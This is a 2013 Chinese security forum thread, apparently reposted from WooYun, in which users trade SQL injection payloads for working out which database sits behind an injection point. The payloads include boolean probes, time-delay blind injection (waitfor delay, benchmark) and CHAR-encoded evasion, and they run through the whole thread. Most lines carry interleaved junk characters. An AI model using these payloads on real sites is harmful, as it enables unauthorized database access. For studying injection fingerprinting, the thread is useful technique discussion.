一个注射点如何最快速确认是什么类型数据库
& V7 t# P# g7 u0 pxsser (十根阳具有长短!!) | 2013-02-05 12:36
, v2 _; U2 f8 |' q, ]9 x& J假设这么一个注射点:
& w3 G4 p# A$ i: N0 @# [, Gshow.html?id=2. Y, T' L3 ] K5 h$ B0 Z _5 Y
mysql:id=2 and version()>0
$ X( I+ ?; G u- Moracle:id=2 and '1'||'1'='11
, r# n5 ~ V4 a4 n其他的欢迎补充9 j) C* M* e4 ?* C6 F `
1#
2 h( L% N! F5 c' R8 ~& Lupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
" N1 N F7 g s* ]2 uAccess:
5 V& k& N: G5 w6 v; _* A3 e4 `5 KaNd aSc(cHr(97))=97
* g6 c' n! j! _% H0 X* K+ Tand exists(select id from MSysAccessObjects)3 l% r9 b7 I" x; y; V. V6 T
SQL Server:
( i( q) e8 N- y! _and exists(select id from sysobjects)
4 i8 d" o% h/ O6 O; dand length(user)>0, W& l6 U2 ?" I Q
MySQL:7 L5 U/ a5 _7 `! ~" u: x; W& w
and length(user())>0
3 b" F8 U$ _" a4 @9 U' C2#9 Z7 U4 G# d# n0 x s
xsser (十根阳具有长短!!) | 2013-02-05 12:48" ?- x( R% r9 ?9 p& Z
@upload 如果这些都不是呢…# z: n/ O8 B. j( Y6 N- z+ \
3#$ f6 a% l2 [% N, k
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03/ F; y: u& q. k6 J* C; p8 N' v2 R$ N
@xsser 不快速的,延时注入
+ J7 j& J$ u& N不知道这样写对不对1 J" i; [9 Z2 o- l; k% A5 ?% J: I0 J
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'7 u2 B- P$ E! v! T0 P {% G
mysql:id=2 and select benchmark(1e8,current_date());
5 Z$ e* N( g, y& n! u4#
V/ z& W% K$ tupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
* `0 R! ]2 o1 ~6 h, |7 f最快的貌似是看报错信息
' Q# v% M0 s( v+ L% |5 q; moracle error
5 M' ]: M: b1 a% A* |& c! {* Hmssql error# w) X. [- x* n2 V) K) k( W& V
mysql error
5 \: r% X N u" ~0 u& F2 t5#
" p7 ^ W) }& YNimda (你们都是坏银~) | 2013-02-05 13:14
! Y" m, R# v K) V小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)5 P6 h. ~/ u( ~7 \# _: x
6#* y7 x+ u2 p8 S5 w L( ^3 x
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
2 ^; I, E' A& d, {/ O7 v“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:! E7 L# a% N) K( E2 h
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
: S# {' }4 D$ e0 C( ~7 b“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
( R4 E- p& p! \& D) W, f! K4 w7#
$ s! m4 v8 X" e! G- T, O_Evil (HackEnd) | 2013-02-05 13:33
. V) _" H7 N7 q2 C) QPostgreSQL9 X. ?0 R+ z% g( @) F, |
8#
; @, r, ?: i; }3 O* ^upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
4 _! R, P# j+ q- C6 ~) C6 G切换编码 and 1=18 c# s! `) ^0 e/ e' P' o9 p- e
oracle:& @2 Y& ~- d" k- G
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
2 |: G3 Q( T( V* x& e+ c& a& Xmssql:% Q* i' t U5 ~4 D- W c1 |# ]
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
+ O' `$ f5 d. B e) G& emysql:
, j* N; x3 H7 O' V& DCHAR(97, 110, 100, 32, 49, 61, 49)) Z( Q+ q0 m& h* c' q" X8 v4 m
9#. R0 N( U# U& @4 d3 B
xsser (十根阳具有长短!!) | 2013-02-05 14:313 z3 t2 f+ R4 j) _6 _
@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
1 P$ c% K, i" p( \* o9 z0 `2 M0 d8 F10#
6 `( S: U s+ F; Pupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:462 ^% D b: k+ C% N& c& {+ Z$ I, l0 {
@xsser 是奇葩数据库类型的么?' P5 q# y$ D3 E# [1 W
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
1 f+ Z5 X( W. B" X$ ]! o6 Q1.是否可以使用特定的函数来判断,该数据库特有的
! [; r/ ~5 O# ~) {, N8 ^2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
2 S/ G* j% l% F( w- f5 v' g/ V4 n3.是否可以编码查询
5 o8 V1 u& k5 {8 W1 {" v3 |4.是否显可以利用错信息
3 e! Y7 @' j8 X5.是否存在数据库某些特性辅助判断
C) R* L4 G5 L! H4 M4 ?+ X/ [个人见解
* z) ~. E* [8 [0 M8 i11#% _- h1 u/ u4 U
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
) u% j7 i1 c' b* p! n k& i1 y6 @已收藏,mssql可以直接看到错误提示的吧~3 \; ^: J/ u/ n5 ~
12#
) X3 U8 G& T, d2 Y+ y5 ePasser_by | 2013-02-05 15:09: B7 ]& C; n) |$ ~1 S) c ?& z
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
. L$ ?& _+ P* I3 ]+ Efrom:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对